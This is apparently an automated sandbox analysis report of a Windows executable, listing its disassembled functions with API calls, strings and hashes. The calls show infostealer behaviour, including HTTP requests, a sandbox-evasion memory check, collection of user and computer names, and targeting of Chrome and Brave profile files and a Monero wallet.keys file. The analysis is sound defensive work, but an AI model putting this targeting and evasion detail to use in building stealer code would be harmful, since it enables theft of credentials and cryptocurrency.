                  • Associated: 00000000.00000002.1712704470.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000110C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.00000000011E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000120D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001225000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713049340.0000000001226000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713140005.00000000013BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713155067.00000000013BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                  • String ID:
                  • API String ID: 941982115-0
                  • Opcode ID: 0d5dfb46824d8aaa39e9c95e2ed31ad929464c4ef5f4fed7b3c1257a34d9be14
                  • Instruction ID: 59aa43c63c7ee39f69ae1c226f20b9de7e2c9da13724a7b908c72b56e9f0f064
                  • Opcode Fuzzy Hash: 0d5dfb46824d8aaa39e9c95e2ed31ad929464c4ef5f4fed7b3c1257a34d9be14
                  • Instruction Fuzzy Hash: 2CF0F870A4021DABE710ABA0EC0ABBE7B74EB45741F104914B517A51D1DBB09981EAB7
                  Function 00D347B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63stringnetworkCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  APIs
                  • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00D34839
                  • InternetCrackUrlA.WININET(00000000,00000000), ref: 00D34849
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  • Associated: 00000000.00000002.1712690782.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000110C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.00000000011E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000120D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001225000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713049340.0000000001226000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713140005.00000000013BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713155067.00000000013BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: CrackInternetlstrlen
                  • String ID: <
                  • API String ID: 1274457161-4251816714
                  • Opcode ID: 507d7c2a9e6f23623fb205ab3bd861094adae8688d3d80b9654f65966668b31c
                  • Instruction ID: 301632d0ff6032a5b4bd8058f96be49dfa746a292cc3a24081246c0145b0741f
                  • Opcode Fuzzy Hash: 507d7c2a9e6f23623fb205ab3bd861094adae8688d3d80b9654f65966668b31c
                  • Instruction Fuzzy Hash: 6F214DB1D00209ABEF14DFA4E845ADE7B75FF44320F108625F929A72C1EB706A05CF92
                  Function 00D451F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                  Download Yara Rule

                  Control-flow Graph

                  APIs
                    • Part of subcall function 00D4A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00D4A7E6
                    • Part of subcall function 00D36280: InternetOpenA.WININET(00D50DFE,00000001,00000000,00000000,00000000), ref: 00D362E1
                    • Part of subcall function 00D36280: StrCmpCA.SHLWAPI(?,00AFE9F8), ref: 00D36303
                    • Part of subcall function 00D36280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00D36335
                    • Part of subcall function 00D36280: HttpOpenRequestA.WININET(00000000,GET,?,00AFE218,00000000,00000000,00400100,00000000), ref: 00D36385
                    • Part of subcall function 00D36280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00D363BF
                    • Part of subcall function 00D36280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00D363D1
                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00D45228
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  • Associated: 00000000.00000002.1712690782.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000110C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.00000000011E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000120D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001225000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713049340.0000000001226000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713140005.00000000013BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713155067.00000000013BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                  • String ID: ERROR$ERROR
                  • API String ID: 3287882509-2579291623
                  • Opcode ID: 4ed2a64b527215fe951fb0ea8ace52bd1155d7af6c8b4153cca183d053516b5f
                  • Instruction ID: 764bd7c76c9df298beea16992475230983d77ab0f1c116ae9595639995102b61
                  • Opcode Fuzzy Hash: 4ed2a64b527215fe951fb0ea8ace52bd1155d7af6c8b4153cca183d053516b5f
                  • Instruction Fuzzy Hash: E8110030954148ABEB14FF68DD92AED7338EF50300F404558F81A5B592EF70AB09CAB2
                  Function 00D31110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON
                  Download Yara Rule
                  APIs
                  • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00D3112B
                  • VirtualAllocExNuma.KERNEL32(00000000), ref: 00D31132
                  • ExitProcess.KERNEL32 ref: 00D31143
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  • Associated: 00000000.00000002.1712690782.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000110C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.00000000011E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000120D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001225000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713049340.0000000001226000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713140005.00000000013BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713155067.00000000013BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Process$AllocCurrentExitNumaVirtual
                  • String ID:
                  • API String ID: 1103761159-0
                  • Opcode ID: 45fb9219c70d708db7fdaf5425d81b259e220b1b537079d77d7d1f9d28afaa4a
                  • Instruction ID: 78bf702b8287c4b18e53dd94d146ac6fd80ad8351d97ec3d6e98eef1e5a61048
                  • Opcode Fuzzy Hash: 45fb9219c70d708db7fdaf5425d81b259e220b1b537079d77d7d1f9d28afaa4a
                  • Instruction Fuzzy Hash: 65E0E67494530CFBE7546BA09D0AB4D7678EB44B02F104054F70D761D0D6B52645A6AB
                  Function 00D310A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON
                  Download Yara Rule
                  APIs
                  • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 00D310B3
                  • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 00D310F7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  • Associated: 00000000.00000002.1712690782.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000110C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.00000000011E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000120D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001225000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713049340.0000000001226000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713140005.00000000013BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713155067.00000000013BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Virtual$AllocFree
                  • String ID:
                  • API String ID: 2087232378-0
                  • Opcode ID: 0edfb0e64b2bfbd0748eab4fe0104a03094f03faa1315114db1772bedba6d00e
                  • Instruction ID: 11e0e3d7fbcea94212452629efdedc49435f015b9b9677f19bfb505cff357a93
                  • Opcode Fuzzy Hash: 0edfb0e64b2bfbd0748eab4fe0104a03094f03faa1315114db1772bedba6d00e
                  • Instruction Fuzzy Hash: 74F0E2B1641208BBEB189AA4AC49FAEB7E8E705B15F301448F504E7280D5719E40DAA1
                  Function 00D31190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00D478E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00D47910
                    • Part of subcall function 00D478E0: RtlAllocateHeap.NTDLL(00000000), ref: 00D47917
                    • Part of subcall function 00D478E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00D4792F
                    • Part of subcall function 00D47850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00D311B7), ref: 00D47880
                    • Part of subcall function 00D47850: RtlAllocateHeap.NTDLL(00000000), ref: 00D47887
                    • Part of subcall function 00D47850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00D4789F
                  • ExitProcess.KERNEL32 ref: 00D311C6
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  • Associated: 00000000.00000002.1712690782.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000110C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.00000000011E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000120D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001225000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713049340.0000000001226000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713140005.00000000013BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713155067.00000000013BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$Process$AllocateName$ComputerExitUser
                  • String ID:
                  • API String ID: 3550813701-0
                  • Opcode ID: f9cfb9cc883a2fc805e631d7a803479b5c73e70220cff5efe4a5bacddcdb0443
                  • Instruction ID: e3e843ae15def6141d413976fb969309e0f37740074ae3ff6a8edbdf569a14ff
                  • Opcode Fuzzy Hash: f9cfb9cc883a2fc805e631d7a803479b5c73e70220cff5efe4a5bacddcdb0443
                  • Instruction Fuzzy Hash: 48E012B591430653CB0477B0BC0BB2E329C9B54786F080824FA09D2102FA65E8419677

                  Non-executed Functions

                  Function 00D438B0 Relevance: 45.8, APIs: 21, Strings: 5, Instructions: 250filestringCOMMON
                  Download Yara Rule
                  APIs
                  • wsprintfA.USER32 ref: 00D438CC
                  • FindFirstFileA.KERNEL32(?,?), ref: 00D438E3
                  • lstrcat.KERNEL32(?,?), ref: 00D43935
                  • StrCmpCA.SHLWAPI(?,00D50F70), ref: 00D43947
                  • StrCmpCA.SHLWAPI(?,00D50F74), ref: 00D4395D
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00D43C67
                  • FindClose.KERNEL32(000000FF), ref: 00D43C7C
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  • Associated: 00000000.00000002.1712690782.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000110C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.00000000011E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000120D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001225000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713049340.0000000001226000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713140005.00000000013BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713155067.00000000013BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                  • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                  • API String ID: 1125553467-2524465048
                  • Opcode ID: 52221bc0ae4166d611ca7497add02f11823234ade792df3ce45d73e891d0ae19
                  • Instruction ID: b81db80f167c0bea1ab0dd2317f57e6ad2de6fc1ea852b9853646a60d129e95e
                  • Opcode Fuzzy Hash: 52221bc0ae4166d611ca7497add02f11823234ade792df3ce45d73e891d0ae19
                  • Instruction Fuzzy Hash: E6A110B1940218ABDB24EBA4DC85FEE7778FF88301F084588A54D96141EB759B89CF72
                  Function 00D3BE70 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675fileCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00D4A740: lstrcpy.KERNEL32(00D50E17,00000000), ref: 00D4A788
                    • Part of subcall function 00D4A920: lstrcpy.KERNEL32(00000000,?), ref: 00D4A972
                    • Part of subcall function 00D4A920: lstrcat.KERNEL32(00000000), ref: 00D4A982
                    • Part of subcall function 00D4A9B0: lstrlen.KERNEL32(?,00AF91D8,?,\Monero\wallet.keys,00D50E17), ref: 00D4A9C5
                    • Part of subcall function 00D4A9B0: lstrcpy.KERNEL32(00000000), ref: 00D4AA04
                    • Part of subcall function 00D4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00D4AA12
                    • Part of subcall function 00D4A8A0: lstrcpy.KERNEL32(?,00D50E17), ref: 00D4A905
                  • FindFirstFileA.KERNEL32(00000000,?,00D50B32,00D50B2B,00000000,?,?,?,00D513F4,00D50B2A), ref: 00D3BEF5
                  • StrCmpCA.SHLWAPI(?,00D513F8), ref: 00D3BF4D
                  • StrCmpCA.SHLWAPI(?,00D513FC), ref: 00D3BF63
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00D3C7BF
                  • FindClose.KERNEL32(000000FF), ref: 00D3C7D1
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  • Associated: 00000000.00000002.1712690782.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000110C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.00000000011E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000120D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001225000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713049340.0000000001226000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713140005.00000000013BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713155067.00000000013BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                  • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                  • API String ID: 3334442632-726946144
                  • Opcode ID: 85ff63eb34149a87cea95cb72e2bce879dd9d623412a37eec194c073754e9748
                  • Instruction ID: 3c3fed2af970b7db027af52e9ecf5926c51ce0ea19e14420cf2d7dabdc253b56
                  • Opcode Fuzzy Hash: 85ff63eb34149a87cea95cb72e2bce879dd9d623412a37eec194c073754e9748
                  • Instruction Fuzzy Hash: 91425272950108ABEB14FB74DD96EED737DEF84300F404558B90AA6191EF34AB49CBB2
                  Function 00D44910 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172fileCOMMON
                  Download Yara Rule
                  APIs
                  • wsprintfA.USER32 ref: 00D4492C
                  • FindFirstFileA.KERNEL32(?,?), ref: 00D44943
                  • StrCmpCA.SHLWAPI(?,00D50FDC), ref: 00D44971
                  • StrCmpCA.SHLWAPI(?,00D50FE0), ref: 00D44987
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00D44B7D
                  • FindClose.KERNEL32(000000FF), ref: 00D44B92
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  • Associated: 00000000.00000002.1712690782.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000110C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.00000000011E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000120D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001225000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713049340.0000000001226000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713140005.00000000013BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713155067.00000000013BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Find$File$CloseFirstNextwsprintf
                  • String ID: %s\%s$%s\%s$%s\*
                  • API String ID: 180737720-445461498
                  • Opcode ID: 04c202ebc4431351194aafa5340993701b5c738c8b7e1459ddb9f0ea00834fc2
                  • Instruction ID: f41693a96c25863472d8cda70152a35a312fb903aabd21f80330b76a99c55f56
                  • Opcode Fuzzy Hash: 04c202ebc4431351194aafa5340993701b5c738c8b7e1459ddb9f0ea00834fc2
                  • Instruction Fuzzy Hash: 3B6113B2500219ABCB24EBA0DC45FEE777CFB88701F044588A54D96141EA75DB89DFB2
                  Function 00D44570 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 137stringmemoryfileCOMMON
                  Download Yara Rule
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00D44580
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00D44587
                  • wsprintfA.USER32 ref: 00D445A6
                  • FindFirstFileA.KERNEL32(?,?), ref: 00D445BD
                  • StrCmpCA.SHLWAPI(?,00D50FC4), ref: 00D445EB
                  • StrCmpCA.SHLWAPI(?,00D50FC8), ref: 00D44601
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00D4468B
                  • FindClose.KERNEL32(000000FF), ref: 00D446A0
                  • lstrcat.KERNEL32(?,00AFEA18), ref: 00D446C5
                  • lstrcat.KERNEL32(?,00AFDBC0), ref: 00D446D8
                  • lstrlen.KERNEL32(?), ref: 00D446E5
                  • lstrlen.KERNEL32(?), ref: 00D446F6
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  • Associated: 00000000.00000002.1712690782.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000110C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.00000000011E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000120D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001225000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713049340.0000000001226000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713140005.00000000013BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713155067.00000000013BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                  • String ID: %s\%s$%s\*
                  • API String ID: 671575355-2848263008
                  • Opcode ID: 496c1c12e90602aa7cc2ca506819edbd1637320e36795921eed91f831634050c
                  • Instruction ID: 5d0c93162240e45786f785c40a0b0f445cef3b4ead4e96500cf346ad269c0dc4
                  • Opcode Fuzzy Hash: 496c1c12e90602aa7cc2ca506819edbd1637320e36795921eed91f831634050c
                  • Instruction Fuzzy Hash: 8B5121B654021CABCB24EB70DC89FED777CAB98701F404588B60D96190EB749AC59FB2
                  Function 00D43EA0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON
                  Download Yara Rule
                  APIs
                  • wsprintfA.USER32 ref: 00D43EC3
